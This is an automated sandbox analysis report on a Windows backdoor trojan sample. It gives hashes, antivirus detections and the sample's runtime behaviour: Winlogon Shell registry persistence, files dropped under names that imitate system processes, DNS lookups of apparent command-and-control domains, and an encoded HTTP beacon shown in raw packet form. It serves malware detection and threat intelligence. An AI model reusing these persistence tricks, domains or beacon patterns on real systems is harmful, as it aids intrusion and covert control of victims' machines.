Analysis Date: 2014-03-11 20:43:54
MD5: c5855ecc9f1fad20977efa4b1d888724
SHA1: 00813eeb21aab96a466b2bfe73a471be3857a7f2

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 5cc01921cca01b1e1dc0689d7accf61b sha1: 703dd8a4fc3ba00c997c93ee746ff7ff08288c7f size: 115712
Section .rdata md5: 6cc0b132cc943478c9b720dd130061c4 sha1: 475bd10ec2b988a038d6d4ea751f68c33b14ab58 size: 1536
Section .data md5: 3938205b0cd00066d564b6a8056fcade sha1: db5bc9fa8489a948931203bb0d9706cc9337933f size: 69632
Section .reloc md5: 7a6e9e88324451da01d9ef02f0ff9e75 sha1: 24533100cced95395a842e0d20024c127093716a size: 1024
Timestamp: 2005-11-29 08:47:37
PEhash: a4d2055686b37cd72e40b4935ca215b6afadc343
IMPhash: 7147d5b1a3625544b54678ed4e32ca9e
AV avg: Win32/Cryptor
AV clamav: Trojan.Gbot-470
AV mcafee: BackDoor-EXI.gen.r

Runtime Details:


Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: worldmotoblo.com
Winsock DNS: 127.0.0.1
Winsock DNS: japanesegreenteaonline.com
Winsock DNS: fastblogportal.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: japanesegreenteaonline.com
Type: A
173.247.248.36
DNS: fastblogportal.com
Type: A
DNS: worldmotoblo.com
Type: A
HTTP GET: http://japanesegreenteaonline.com/assets/images/greentea-cha-1.gif?v56=99&tq=gJ4WK%2FSUh7TFlER8oY%2BQtMWTUj26kJH7yZJSPLqVybhqtUn5CGFATA%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 173.247.248.36:80

Raw Pcap
0x00000000 (00000)   47455420 2f617373 6574732f 696d6167   GET /assets/imag
0x00000010 (00016)   65732f67 7265656e 7465612d 6368612d   es/greentea-cha-
0x00000020 (00032)   312e6769 663f7635 363d3939 2674713d   1.gif?v56=99&tq=
0x00000030 (00048)   674a3457 4b253246 53556837 54466c45   gJ4WK%2FSUh7TFlE
0x00000040 (00064)   52386f59 25324251 744d5754 556a3236   R8oY%2BQtMWTUj26
0x00000050 (00080)   6b4a4837 795a4a53 504c7156 79626871   kJH7yZJSPLqVybhq
0x00000060 (00096)   74556e35 43474641 54412533 44253344   tUn5CGFATA%3D%3D
0x00000070 (00112)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000080 (00128)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000090 (00144)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x000000a0 (00160)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x000000b0 (00176)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x000000c0 (00192)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x000000d0 (00208)   2f322e30 0d0a0d0a                     /2.0....


Strings
080904b0
1.0.0.1
1815
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
`````````````
```      
^^^^^^
~~~~~~~~
<<<<<<<((((
>>>>>>>>>>
>@$^*(	
      
               
______
_______
_____________________
------
---------
-----,,,,..
,,,,,,,,
,,,,,,,,,
;;;;;;
;;;;;;;
;;;;;;;;;;;;;;;
::::::::
::::::::::::
:::::::::::::::::::::
!!!!>>>>>
????????
///////
"^^^^^^^^^........
"""""""""
"""""""""''''
)))))))))))))))))))
[[[[[[[
{{{{{{{{{{{{{{{{
}}}}}}}}}}
}}}}}}}}}}}}}}}}}}}}
@@@@@////
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
*************
&&&&&&&
&&&&&&&&&
&&&&&&&&&&&&
###]]]]]]]
########
################
%%%%%%
%%%%%%%%%
+++++++++*
						
							
								
									
												
																			
00&&&&NNNNNLLLLL
(04`Xn
0(`@@)D
0G*QR^
{(  0w
111111111111111
18__]`
1:"arHw.
 @@1BIQ
1Cdu^H`
1`FvZI"
1J|,I-
^?[1KT
1O|dP-q
1O@\L?Xwh
 . `1s
1WA0JO
`1wU\:oI
%~1`|x4R
1yC+C`
2^\0{$
222222
22222222222
2222222222222
22222222222222222222222
2AWg^\
2j_Eb)
%}2w@-W
33333333
3333333333333333
39d7,@
 []3}S	j
4< @@{
444444
44444444444
4444444444444444VVVVVVV###
4444555VVV
`_\~4g
4g3?2H&=*
4i2e9t_
`4(?i2Mge
4j0Mv$m
4  `J2
4;qL_N
@4^<sN
4S;R* 
4sssssssssss
&&&&55
5555555
555555555
555xx77
5*` G `
5%,Uw,
5!&` y
	}+!~!_+6
6;"  \
666666
6666666666
6BZ3.MI
6uJc"@
77777{{{{{{{{{{{{{{{{		
77777777
7?Les[
=7Q8<Z
@ 7TZyE
7vcrd_omE
7wgjzY
.7X\u)
--)7Zr>3
!!!!!8
8bs8(Hh
,@@?:8C
8RRRRRR
999999
99999999((
[[[[9999999999
9999999999999999999ssssppppppp==
99ttttttddddddaarrrrbbbb
9h:YCx
9'QX)8
9sRp*u
9wtE-$
,,,,,,,,,,,a+
A@@@@@@@
a53:y%
aaaaaa
AAAAAA
_	A-Fg
/AFLtS
a[MMMM
--|A\v
  Av?w	
A=ySa9mj
b,  1'tK 
bbbbb~
BBBBBNN
BitBlt
bL^#@j
b#.  N
+BQ'pj
B}U$)\
bw8L>8
bxh7it
bZ5N]@
c<$@@2\
C2IW_B`"-
CC^^^^^
cccccccccc
CCCCCCCCCCC
cccccccccccc}
ccccccccccccccc
~~~~~CCPPP
"C/eW,
~(@`cFD
cLTOZh
CreateCompatibleDC
CreateFileW
cX1$@`\
CXbOLi
?{|CzA$H
@.data
DDDDDDDD
dddddddddddd
DDDDDDDDDDDD
DDDDDDDDDDDDDDDDDD
DeleteCriticalSection
DeleteDC
Dh<_G]P@_
;d\Uc$@
DuplicateHandle
dWl+]+
E::::::
EEEEEEE
eeMMMMMMMMMM
ee(U~	s
eh.dll
Eoq_vN
eq{I=vd
eW"0gO)n
EwI!GH
exGsmR
ExitProcess
f0[Mhp
[f@8.]
 ( @F9
f9`1r0
fA[)GS*
FFFFFF
fffffffffffffffffffff
}}}}}}}fffffffffMMMMMMMMMMMMMMMMMMMMM;;;;
FlushInstructionCache
FormatMessageA
;!F><P#
F. `q"@`
`fU.` 5
$`f?Yq
,` +g-
G0i@}G
@G3.@@
=<g8DH;3
g !8Y_
g B[S(
GetCommandLineA
GetCurrentProcess
GetCurrentThreadId
GetDeviceCaps
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetLastError
GetObjectA
GetStartupInfoA
GetTempPathW
GetThreadContext
GetVersionExW
GetWindowsDirectoryW
//GGGG
ggggg11111111111
~~~~~~~gggggggggggg7777
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
g"@ on
gp|O8K#k
guW(  
` |'h]
h;;;;;;;;;;;;;;;
]h$2]&
};|~h9
HeapAlloc
HeapFree
hhhhhhhhhhhhhhhhh"
hL-6b)!stD,
HSU)v=&
&;(h!X
%	i4Mw
i6Wipl 
I]ctzbl
 @id\G3=
IIIIIIIIIIIIIIIII||
I)I @@R
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IU~<c~
IUcX"`;
 J& `%
J6vZ?+
JcbUKV
:[j`cx
`JD7H:
JJJJJB
::::::::::::::___________jjjjjjjj
jjjjjjjjjjj
JJJJJJJJJJJJ???????
jjjjjjjjjjjjjjjjjjjjj
@JJ/T|pg
"@`JmU
@\;J^N
  j~z0
|kay]#
kd)#9a
K@dE?Lk
kdLj_~
KERNEL32.dll
(@`k-g
KKK=<<<<<<<<<<
kkkkkk&&
KSNEE	
kVide7
~k(ww~
%kY<cW
L"~ 7#
LE+:ko
^Li384
L*/IV*
:::||lllll{{{
llllll
LLLLLLLLL
LLLLLLLLLL
llllllllllllllll
LM-gzg
LocalFree
lu^]z&`
^LV8q2J
lYq|G2
M444444444
^ M[}d1
Mfffff
mL||8Y
mm%eeee
mmmmmm
MMMMMM
!!!MMMMMM^
+++))mmmmmmm
MMMMMMMMMM{{{{{{{{{{{hhh
MN>`gw/
;m PK-
'Mq<3B<	
 `Ms<	
MW	p;-k
#n	.@`
N0&@@{Dz
<n4T[fG{
NdrByteCountPointerFree
NJ9j|0J
nnn,,,,,
nnnllllllllll
nnnnnn\
NNNNNNN999999
nnnnnnnnn
nnnnnnnnnn
NNNNNNNNNN
NNNNNNNUUUUUUUUUUUUUUUUUUUUUUUUUU
NoI3Gc
nO/}LC
nWBil4
nx8bZ8@
!"``N_Z
o:1ap;ps8
	o!A5d
ob(I}]
^OGJ|T
o$@`Hb
 OiqJj
ojcAG&
.ONzv:
oo*>>>>>>>
OOOOO^^^A
OOOOOO
OOOOOOOOOOOO
oooooooooooooooo
^^^^^OOOOPPPPP
or"f:R.a
`@oYqe~}
! ``P&`
P2oMu0
/p%>b~
pdE3#K
ph8,wx
P=H@Wz31
_pj>!ds
PMwz;g+
ppppp.
PPPPPPHH^HHPPPPPccccccc
[~pqYG
prR{@&
PsXRb:
,p_%t3
>P#UoG
p^.@`z
}, @q^& 
Q0#L<-
Q3:MKU
Qi6\z?
q   <l6q
qqqq|||||||
;;qqqqq
,QQQQQ
QQQQQQQQ;;
qqqqqUUUUUUU
Q}" `w!
qWd>r_
q!{yXxG_e
QZ1P6.
RaiseException
##r>C\
`.rdata
RealizePalette
.reloc
& `r%H
 R. @lP4
RPCRT4.dll
RpcStringFreeA
rR#^'=C
RRRR}}}}}}}}}}
rrrrrr
rrrrrrrrrrr
==RRRRRRRRRRRRRRRRRRRRRRRRRR
RtlUnwind
R=V,` 
}rZ:Vgr
`?|S5^=
;s8e]e
SelectObject
SelectPalette
SetLastError
SetLocaleInfoW
SetMapMode
SFDywep
SgifsJrw%8
,S`K":8hK[
Sm'p:6
SP(1BL
`@sPzaA
srG ($7O
SSSSSSSSSSSDDDDDD
ssssssssssssssss
StrDupA
StrDupW
StrFormatByteSizeEx
StrRChrA
StrRChrW
StrRetToBSTR
StrRetToBufW
StrRetToStrW
StrStrA
StrStrIA
StrStrIW
StrStrW
StrToInt64ExW
StrToIntA
StrToIntExW
StrToIntW
StrTrimW
`sYVJ]
t|B!Wl
@TcAhQ"
!This program cannot be run in DOS mode.
TKN9e5
` TLHX
TlsSetValue
TMHOX/B
tm,  z
^^^^^^^^^^^^^^TTT=
TTTTT..
TTTTTT
tttttttt
TTTTTTTT
TTTTTTTTTTT
TTTTTTTTTTTTTTTTTTTTTT
ttttttttttttttttttttttt66
U2%E|AA
 U8UOD
:u`C]M
%uH)EM
$@ UjJ
uL||e_
UnrealizeObject
uQdujL
u)qX>e8Nc
UrlApplySchemeA
UrlApplySchemeW
UrlCanonicalizeA
UrlCanonicalizeW
UrlCombineA
UrlCombineW
UrlEscapeA
UrlEscapeW
UrlGetPartW
UrlUnescapeA
UrlUnescapeW
UuidCreate
UuidToStringA
&UUUUU
uuuuuu
UUUUUU&&&&&&&&&&&
uuuuuuuSSSSSSSSSSSSSS/////
u\wUGs
UW<!xJ*
~V&` ;
V3F8A6M
v{C#,V
VerQueryValueA
VERSION.dll
VirtualProtectEx
%V.J|`O
VK:u?u
"VR8+*
vrTuUq
/vS:R&
Vu8p%h
vvaaaGGGGGOOOOO
~~~~~vvvvvvvv
VVVVVVVVV
VVVVVVVVVVV
vwvnsprintfW
vXSy+n;
_[/vxVq$
vz^p|0x
 `w[* 
@@@@@w
W#9$ @
WaitForSingleObject
Wcz[yM
$wdp({
W/h}5@r
.  wI-
 @Wi34
WKK      
wnsprintfA
wnsprintfW
`&wPC/
W~PMFm
WriteProcessMemory
`;wuEe
W[%'Uh
Wv6MI:
W}@VkI
wwGGGG
WWQ" @
>>>>>wwwww
,====wwwww
wwwwwmmmmmOOOOOOOOOOOO
`````wwwwww
WWWWWW
WWWWWWBKK
\x2X;a
_XBOqdF
=-xcQ?
`{XCt}^l
xeurGq
@x-)Hxt
xm*u-*
xnDum>8q;S
X@oWhh
X]Pf)W
xUGQ@`Pi
;xV2C*
xx((((((
xxxmmmmmmTTTTTTlll
XXXXXXXX
{{{{{{{{{{{{xxxxxxxxx
xxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxHHH
Xy'i, 
`@xYTOU
XZQi*/g<a
xzwX4J
Yb[Gc4
Y`CVT=
Ydq F3jk
?Y _,M
[YmqR\
YRRRRRRR
<Y,uj@W
 _y%W#
@@@@@@@(YYY##
yyyyyyyyy
YYYYYYYYY
YYYYYYYYYY
yyyyyyyyyyyyyyyyyy
y-zJ"@
zaVPoA
|,``ZB
zce@* 
z((eeeeeeeeeee
zPv}b;X
ZQN$R-&
ZQ|zCF
Zrrrrrrrrrrrrrrrrrr
Zs\@0Z
ZSY<-^
~~~~ZZZ
ZZZZZZZ
ZZZZZZZZ
zzzzzzzzzzzzzzzzzzqqqqq